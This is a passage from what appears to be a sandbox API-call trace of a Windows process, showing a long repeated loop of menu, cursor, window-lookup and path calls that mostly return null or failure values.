ptScreen=0x352) returned -1 [0176.035] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.035] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.035] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.035] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.035] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.035] GetStockObject (i=6) returned 0x1b00018 [0176.035] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.035] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.035] PathFileExistsW (pszPath=0x0) returned 0 [0176.035] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.035] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.035] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.035] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.035] GetMenu (hWnd=0x0) returned 0x0 [0176.035] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x350) returned -1 [0176.035] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.035] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.035] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.035] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.035] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.035] GetStockObject (i=6) returned 0x1b00018 [0176.035] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.035] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.035] PathFileExistsW (pszPath=0x0) returned 0 [0176.035] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.035] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.035] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.035] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.035] GetMenu (hWnd=0x0) returned 0x0 [0176.035] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x2bc) returned -1 [0176.036] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.036] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.036] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.036] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.036] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.036] GetStockObject (i=6) returned 0x1b00018 [0176.036] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.036] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.036] PathFileExistsW (pszPath=0x0) returned 0 [0176.036] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.036] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.036] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.036] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.036] GetMenu (hWnd=0x0) returned 0x0 [0176.036] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.036] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.036] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.036] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.036] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.036] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.036] GetStockObject (i=6) returned 0x1b00018 [0176.036] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.036] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.036] PathFileExistsW (pszPath=0x0) returned 0 [0176.036] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.036] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.036] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.036] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.036] GetMenu (hWnd=0x0) returned 0x0 [0176.036] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x351) returned -1 [0176.036] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.036] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.036] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.036] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.036] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.037] GetStockObject (i=6) returned 0x1b00018 [0176.037] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.037] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.037] PathFileExistsW (pszPath=0x0) returned 0 [0176.037] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.037] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.037] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.037] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.037] GetMenu (hWnd=0x0) returned 0x0 [0176.037] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.037] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.037] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.037] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.037] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.037] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.037] GetStockObject (i=6) returned 0x1b00018 [0176.037] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.037] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.037] PathFileExistsW (pszPath=0x0) returned 0 [0176.037] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.037] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.037] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.037] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.037] GetMenu (hWnd=0x0) returned 0x0 [0176.037] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x353) returned -1 [0176.037] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.037] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.037] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.037] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.037] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.037] GetStockObject (i=6) returned 0x1b00018 [0176.037] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.037] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.037] PathFileExistsW (pszPath=0x0) returned 0 [0176.037] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.038] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.038] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.038] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.038] GetMenu (hWnd=0x0) returned 0x0 [0176.038] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x39) returned -1 [0176.038] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.038] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.038] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.038] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.038] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.038] GetStockObject (i=6) returned 0x1b00018 [0176.038] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.038] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.038] PathFileExistsW (pszPath=0x0) returned 0 [0176.038] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.038] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.038] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.038] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.038] GetMenu (hWnd=0x0) returned 0x0 [0176.038] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.038] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.038] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.038] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.038] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.038] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.038] GetStockObject (i=6) returned 0x1b00018 [0176.038] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.038] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.038] PathFileExistsW (pszPath=0x0) returned 0 [0176.038] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.038] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.038] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.038] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.038] GetMenu (hWnd=0x0) returned 0x0 [0176.038] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.039] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.039] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.039] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.039] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.039] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.039] GetStockObject (i=6) returned 0x1b00018 [0176.039] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.039] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.098] PathFileExistsW (pszPath=0x0) returned 0 [0176.098] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.098] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.099] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.099] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.099] GetMenu (hWnd=0x0) returned 0x0 [0176.099] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.099] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.099] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.099] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.099] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.099] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.099] GetStockObject (i=6) returned 0x1b00018 [0176.099] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.099] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.099] PathFileExistsW (pszPath=0x0) returned 0 [0176.099] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.099] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.099] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.099] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.099] GetMenu (hWnd=0x0) returned 0x0 [0176.099] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x350) returned -1 [0176.099] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.099] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.099] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.099] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.099] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.099] GetStockObject (i=6) returned 0x1b00018 [0176.099] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.099] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.099] PathFileExistsW (pszPath=0x0) returned 0 [0176.099] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.099] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.099] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.099] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.099] GetMenu (hWnd=0x0) returned 0x0 [0176.100] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x470) returned -1 [0176.100] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.100] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.100] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.100] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.100] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.100] GetStockObject (i=6) returned 0x1b00018 [0176.100] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.100] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.100] PathFileExistsW (pszPath=0x0) returned 0 [0176.100] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.100] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.100] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.100] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.100] GetMenu (hWnd=0x0) returned 0x0 [0176.100] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.100] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.100] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.100] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.100] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.100] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.100] GetStockObject (i=6) returned 0x1b00018 [0176.100] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.100] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.100] PathFileExistsW (pszPath=0x0) returned 0 [0176.100] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.100] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.100] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.100] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.100] GetMenu (hWnd=0x0) returned 0x0 [0176.100] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x34f) returned -1 [0176.100] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.100] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.100] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.100] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.101] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.101] GetStockObject (i=6) returned 0x1b00018 [0176.101] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.101] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.101] PathFileExistsW (pszPath=0x0) returned 0 [0176.101] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.101] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.101] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.101] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.101] GetMenu (hWnd=0x0) returned 0x0 [0176.101] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.101] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.101] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.101] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.101] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.101] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.101] GetStockObject (i=6) returned 0x1b00018 [0176.101] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.101] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.101] PathFileExistsW (pszPath=0x0) returned 0 [0176.101] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.101] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.101] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.101] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.101] GetMenu (hWnd=0x0) returned 0x0 [0176.101] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x34f) returned -1 [0176.101] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.101] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.101] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.102] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.102] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.102] GetStockObject (i=6) returned 0x1b00018 [0176.102] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.102] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.102] PathFileExistsW (pszPath=0x0) returned 0 [0176.102] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.102] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.102] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.102] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.102] GetMenu (hWnd=0x0) returned 0x0 [0176.102] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x2aa) returned -1 [0176.102] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.102] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.102] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.102] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.102] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.102] GetStockObject (i=6) returned 0x1b00018 [0176.102] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.102] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.102] PathFileExistsW (pszPath=0x0) returned 0 [0176.102] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.102] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.102] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.102] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.102] GetMenu (hWnd=0x0) returned 0x0 [0176.102] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.102] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.102] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.102] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.102] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.102] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.102] GetStockObject (i=6) returned 0x1b00018 [0176.102] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.103] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.103] PathFileExistsW (pszPath=0x0) returned 0 [0176.103] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.103] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.103] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.103] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.103] GetMenu (hWnd=0x0) returned 0x0 [0176.103] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x355) returned -1 [0176.103] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.103] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.103] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.103] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.103] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.103] GetStockObject (i=6) returned 0x1b00018 [0176.103] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.103] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.103] PathFileExistsW (pszPath=0x0) returned 0 [0176.103] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.103] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.103] FindWindowA 